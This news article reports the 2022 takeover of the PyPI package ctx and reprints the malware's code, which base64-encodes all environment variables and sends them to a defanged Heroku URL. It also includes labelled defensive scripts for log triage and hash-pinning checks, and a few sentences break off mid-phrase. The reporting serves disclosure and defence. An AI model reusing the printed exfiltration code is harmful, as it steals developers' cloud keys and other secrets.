Updated The Python Package Index (PyPI), a repository for Python software libraries, has informed Python developers that the ctx package has been compromised.
Any installation of the software within the last ten days should be investigated to determine if sensitive account credentials stored in environment variables, such as cloud access keys, have been stolen.
PyPI administrators estimate that around 27,000 malicious copies of ctx have been downloaded from the registry since the malicious versions of ctx first appeared, beginning around 7:18 p.m. UTC on May 14, 2022.
They add that a safe version of ctx (1.2) is a dependency of another package, the Context Engine. But the newer malicious versions of ctx do not appear as dependencies in other packages scanned by
“The ctx project hosted on PyPI was taken over via user account compromise and replaced with a malicious project containing runtime code that harvested the contents of os.environ.items() when instantiating Ctx objects,” PyPI administrators explain in a security advisory released on Tuesday. “The captured environment variables were sent as a base64-encoded query parameter to a Heroku application running on

This URL is currently not configured to respond to web requests over HTTP – the application has likely been disabled or removed.”
In a blog post on Tuesday, Yee Ching Tok, head of the Internet Storm Center, observes that another (more accessible) project on GitHub – github.com/hautelook/phpass – contained the same malicious Heroku domain in its PHP code.
The ctx package, now removed from PyPI, is a Python library for accessing Python dictionaries using dot notation. It remained unchanged for the past eight years (as it remains on GitHub) until May 14, 2022. That’s when the email domain expired.
A Reddit post from three days ago that announced the arrival of the new version of ctx may come from someone involved in the subversion of the package. At least that’s the speculation of those who replied to the now-deleted initial post. The Register emailed the person in question – whose GitHub account includes security and hacking tools – to ask about it, but we haven’t heard back.
The exfiltration code is not sophisticated, which could indicate that the attack is more exploratory than malicious. It browses environment variables stored on the victim’s machine, encodes them in base64 and appends them to a Heroku application URL as query parameters.
    import os
    import base64
    import requests

    class Ctx(dict):
        def __init__(self):
            # Exfiltration fires as soon as a Ctx object is created
            self.sendRequest()

        def sendRequest(self):
            # Concatenate the value of every environment variable, space-separated
            string = ""
            for _, value in os.environ.items():
                string += value + " "
            # Base64-encode the blob and send it in the request path to the Heroku app
            message_bytes = string.encode('ascii')
            base64_bytes = base64.b64encode(message_bytes)
            base64_message = base64_bytes.decode('ascii')
            response = requests.get("hxxps://anti-theft-web.herokuapp.com/hacked/" + base64_message)
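For anyone following the advice above to investigate installations from the affected window, the useful artefact is the outbound request itself: the environment values travel base64-encoded in the request path, so an egress or proxy log that recorded the full URL still holds everything that was sent. The following is an added example (not code from the article, PyPI or the ctx project) that decodes such a request and flags values that look like credentials. It assumes a constructed log format with the URL as the third whitespace-separated field; the hostname and path prefix are taken from the article’s defanged URL, and the credential patterns and sample log lines are constructed heuristics, not an exhaustive list.

```python
"""Triage helper for ctx-style environment exfiltration (added example, not the article's code)."""
import base64
import binascii
import re
from urllib.parse import urlsplit

# Host and path prefix from the article's defanged URL (hxxps://anti-theft-web.herokuapp.com/hacked/...)
EXFIL_HOST = "anti-theft-web.herokuapp.com"
EXFIL_PATH_PREFIX = "/hacked/"

# Constructed heuristics for credential-looking values; extend for your own environment
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"^(AKIA|ASIA)[0-9A-Z]{16}$"),
    "github_token": re.compile(r"^gh[pousr]_[A-Za-z0-9]{20,}$"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "high_entropy_40": re.compile(r"^[A-Za-z0-9+/=]{40}$"),
}


def decode_payload(url):
    """Return the list of exfiltrated values carried by an exfil URL, or None if the URL is not one."""
    parts = urlsplit(url)
    if parts.hostname != EXFIL_HOST or not parts.path.startswith(EXFIL_PATH_PREFIX):
        return None
    blob = parts.path[len(EXFIL_PATH_PREFIX):]
    try:
        text = base64.b64decode(blob, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not something the malware's encoder would have produced
    # The malware appended a single space after every value, so strip the trailing one.
    # Splitting on spaces is lossy for values that themselves contain spaces; good enough for triage.
    text = text[:-1] if text.endswith(" ") else text
    return text.split(" ")


def classify(values):
    """Pair each value with the names of the credential patterns it matches (non-matching values dropped)."""
    findings = []
    for value in values:
        tags = [name for name, pattern in SECRET_PATTERNS.items() if pattern.search(value)]
        if tags:
            findings.append((value, tags))
    return findings


def triage_log(lines):
    """Scan log lines; return (number of exfil requests seen, credential-like findings)."""
    hits = 0
    findings = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        values = decode_payload(fields[2])
        if values is None:
            continue
        hits += 1
        findings.extend(classify(values))
    return hits, findings


def _build_sample_log():
    """Constructed sample: one benign PyPI fetch and one request to the exfil endpoint.
    AKIAIOSFODNN7EXAMPLE is AWS's documented example key id, not a live credential."""
    env_blob = "/usr/bin:/bin AKIAIOSFODNN7EXAMPLE user "
    b64 = base64.b64encode(env_blob.encode("ascii")).decode("ascii")
    return [
        "2022-05-14T19:20:01Z 10.0.0.5 https://pypi.org/simple/requests/ 200",
        f"2022-05-14T19:20:07Z 10.0.0.5 https://{EXFIL_HOST}{EXFIL_PATH_PREFIX}{b64} 404",
    ]


SAMPLE_LOG = _build_sample_log()

if __name__ == "__main__":
    hits, findings = triage_log(SAMPLE_LOG)
    print(f"{hits} request(s) to the exfil endpoint")
    for value, tags in findings:
        print(f"  {value[:4]}... matches {tags}")
```

A hit means the host contacted the endpoint, which is the trigger to rotate every credential that was in that process's environment, whether or not the heuristics above recognised it; the classification only helps prioritise which secrets to rotate first.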
A post Monday by another Reddit user seems to be among the first to sound the alarm.
Those who oversee PyPI say that domain takeovers are a known attack vector and that defending PyPI against it involves removing an address’s “verified” email status – which is necessary to process a password update – if a PyPI email to the account bounces. But triggering deverification requires PyPI to send an email to the expired domain between the time of expiration and the domain takeover. And that doesn’t seem to have happened.

Pythonistas note that they could perform this kind of analysis on an ongoing basis and freeze accounts associated with expired or near-expired domains, but this would come “at the cost of an increased support load for the moderator team and PyPI administrators”.
PyPI admins recommend enabling multi-factor authentication for PyPI accounts and using version pinning and hash checking mode for greater security. ®
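Version pinning and hash-checking mode are only protective if every requirement actually carries a pin and a hash, which is easy to let slip in a large requirements file. The following added example (not PyPI’s or pip’s own code) is the kind of CI check that enforces that discipline: it parses a requirements file in pip’s format, reports requirements that are unpinned or hash-less, and shows the digest comparison that hash-checking mode performs against a downloaded artifact. The requirements text, the package name examplepkg and the artifact bytes are constructed for the example; the hash is computed from those bytes and is not a real release hash.

```python
"""Requirements pinning and hash policy check (added example, not pip's or PyPI's code)."""
import hashlib
import re

# name==version at the start of a requirement line
PIN_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([^\s\\]+)")
# every --hash=algo:hexdigest option on the logical line
HASH_RE = re.compile(r"--hash=([a-z0-9]+):([0-9a-f]+)")


def parse_requirements(text):
    """Return {name: (pinned_version_or_None, {(algo, digest), ...})}.

    Joins pip's backslash line continuations and ignores comments and option-only lines."""
    logical = text.replace("\\\n", " ")
    reqs = {}
    for line in logical.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = PIN_RE.match(line)
        if m:
            name, version = m.group(1).lower(), m.group(2)
        else:
            name, version = re.split(r"[<>=!~\s]", line, 1)[0].lower(), None
        reqs[name] = (version, set(HASH_RE.findall(line)))
    return reqs


def policy_findings(text):
    """List (name, problem) for every requirement that is not exactly pinned or carries no hash."""
    findings = []
    for name, (version, hashes) in parse_requirements(text).items():
        if version is None:
            findings.append((name, "not pinned with =="))
        if not hashes:
            findings.append((name, "no --hash; hash-checking mode would refuse it"))
    return findings


def verify_artifact(data, hashes):
    """True if the artifact's digest matches one of the pinned hashes (what pip checks before installing)."""
    return any(hashlib.new(algo, data).hexdigest() == digest for algo, digest in hashes)


# Constructed stand-in for a downloaded wheel; its sha256 is computed, not a real release hash
ARTIFACT = b"constructed wheel bytes standing in for examplepkg-1.0.0-py3-none-any.whl"
ARTIFACT_SHA256 = hashlib.sha256(ARTIFACT).hexdigest()

GOOD_REQS = (
    "examplepkg==1.0.0 \\\n"
    f"    --hash=sha256:{ARTIFACT_SHA256}\n"
)
WEAK_REQS = "examplepkg\nrequests>=2.0\n"

if __name__ == "__main__":
    for label, text in (("good", GOOD_REQS), ("weak", WEAK_REQS)):
        print(label, policy_findings(text) or "ok")
    pinned = parse_requirements(GOOD_REQS)["examplepkg"][1]
    print("genuine artifact accepted:", verify_artifact(ARTIFACT, pinned))
    print("tampered artifact accepted:", verify_artifact(ARTIFACT + b"!", pinned))
```

In practice the digest check is done by running pip with --require-hashes against the vetted requirements file; the script above is the gate that keeps such a file from quietly losing its pins and hashes over time.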
Updated to add
The person who modified the content of ctx spoke out, saying that they had not only tampered with the Python library but also with PHPass. The netizen said they got 1,000 environment variables from the vandalized dependencies, but insisted there was no malicious intent and that it was an attempt to demonstrate insecurities with third-party packages.
“ALL DATA I HAVE RECEIVED IS DELETED AND NOT USED,” they added.